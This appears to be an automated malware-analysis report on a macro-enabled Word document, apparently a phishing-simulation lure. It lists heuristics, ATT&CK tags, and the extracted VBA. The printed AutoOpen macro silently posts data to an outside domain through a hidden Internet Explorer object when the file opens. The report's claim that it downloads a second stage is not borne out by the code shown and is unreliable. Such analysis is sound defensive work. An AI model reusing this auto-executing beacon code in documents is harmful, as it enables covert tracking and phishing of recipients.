MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro attempts to execute code using CreateObject, likely to download a second-stage payload from the URL http://anwalts-kanzleien-bern.ch/id0005###################################################################################################################. The document body prompts the user to enable content and macros, indicating a social engineering lure.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://anwalts-kanzleien-bern.ch/id0005################################################################################################################### In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6315 bytes |
SHA-256: 20594179a226855be310f1bf88c2301c668a80d117f1146e8d10b3f00a0c1063 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Option Explicit
'Option Base 0
Const MAX_ATTEMPTS = 3
Const CONNECTION_TIMEOUT = 60
Const HTTP_READY = 4
' Run process
Sub RunProcess(sURL)
Dim lAttempt, tmr
If InStr(1, sURL, "%lucy_url%") > 0 Then
Exit Sub
End If
lAttempt = 0
' Post data
While IEPostData(sURL, "data=RHVtbXkgZGF0YSBmcm9tIEhUVFAtb25seSBtYWNybw==") = False And lAttempt < MAX_ATTEMPTS
tmr = Timer()
Do
Loop Until (Timer() - tmr) > 1
lAttempt = lAttempt + 1
Wend
On Error Resume Next
End Sub
' IE post data
Function IEPostData(sURL, sData)
On Error Resume Next
Dim dtmp, objIE
Dim bData() As Byte
ReDim bData(Len(sData) - 1)
bData = StrConv(sData, vbFromUnicode)
Set objIE = CreateObject("InternetExplorer.Application")
objIE.Visible = False
objIE.Navigate sURL, Nothing, Nothing, bData, "Content-Type: application/x-www-form-urlencoded" + Chr(10) + Chr(13)
dtmp = Timer()
Do
Loop Until (Not objIE.busy And objIE.ReadyState = HTTP_READY) Or (Timer() - dtmp) > CONNECTION_TIMEOUT
IEPostData = (Not objIE.busy And objIE.ReadyState = HTTP_READY)
objIE.Quit
Set objIE = Nothing
End Function
' Clean variable string
Function Clean(data)
If InStr(1, data, "#") > 0 Then
Clean = Left(data, InStr(1, data, "#") - 1)
Else
Clean = data
End If
End Function
' Main function
Sub AutoOpen()
Dim sURL
sURL = "http://anwalts-kanzleien-bern.ch/id0005###################################################################################################################"
RunProcess Clean(sURL)
End Sub
''
' Processing file: /opt/analyzer/scan_staging/36331bb9fb4d434ba53b6823531ead0e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1073 bytes
' Macros/VBA/NewMacros - 4778 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' QuoteRem 0x0000 0x000D "Option Base 0"
' Line #2:
' Line #3:
' Dim (Const)
' LitDI2 0x0003
' VarDefn Office
' Line #4:
' Dim (Const)
' LitDI2 0x003C
' VarDefn ThisDocument
' Line #5:
' Dim (Const)
' LitDI2 0x0004
' VarDefn _Evaluate
' Line #6:
' Line #7:
' QuoteRem 0x0000 0x000C " Run process"
' Line #8:
' FuncDefn (Sub NewMacros(MAX_ATTEMPTS))
' Line #9:
' Dim
' VarDefn CONNECTION_TIMEOUT
' VarDefn HTTP_READY
' Line #10:
' Line #11:
' LitDI2 0x0001
' Ld MAX_ATTEMPTS
' LitStr 0x000A "%lucy_url%"
' FnInStr3
' LitDI2 0x0000
' Gt
' IfBlock
' Line #12:
' ExitSub
' Line #13:
' EndIfBlock
' Line #14:
' Line #15:
' LitDI2 0x0000
' St CONNECTION_TIMEOUT
' Line #16:
' Line #17:
' QuoteRem 0x0004 0x000A " Post data"
' Line #18:
' Ld MAX_ATTEMPTS
' LitStr 0x0031 "data=RHVtbXkgZGF0YSBmcm9tIEhUVFAtb25seSBtYWNybw=="
' ArgsLd RunProcess 0x0002
' LitVarSpecial (False)
' Eq
' Ld CONNECTION_TIMEOUT
' Ld Office
' Lt
' And
' While
' Line #19:
' ArgsLd sURL 0x0000
' St HTTP_READY
' Line #20:
' Line #21:
' Do
' Line #22:
' ArgsLd sURL 0x0000
' Ld HTTP_READY
' Sub
' Paren
' LitDI2 0x0001
' Gt
' LoopUntil
' Line #23:
' Line #24:
' Ld CONNECTION_TIMEOUT
' LitDI2 0x0001
' Add
' St CONNECTION_TIMEOUT
' Line #25:
' Wend
' Line #26:
' Line #27:
' OnError (Resume Next)
' Line #28:
' EndSub
' Line #29:
' Line #30:
' QuoteRem 0x0000 0x000D " IE post data"
' Line #31:
' FuncDefn (Function RunProcess(MAX_ATTEMPTS, lAttempt))
' Line #32:
' OnError (Resume Next)
' Line #33:
' Line #34:
' Dim
' VarDefn tmr
' VarDefn IEPostData
' Line #35:
' Dim
' VarDefn Timer (As Byte)
' Line #36:
' Line #37:
' OptionBase
' Ld lAttempt
' FnLen
' LitDI2 0x0001
' Sub
' Redim Timer 0x0001 (As Variant)
' Line #38:
'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.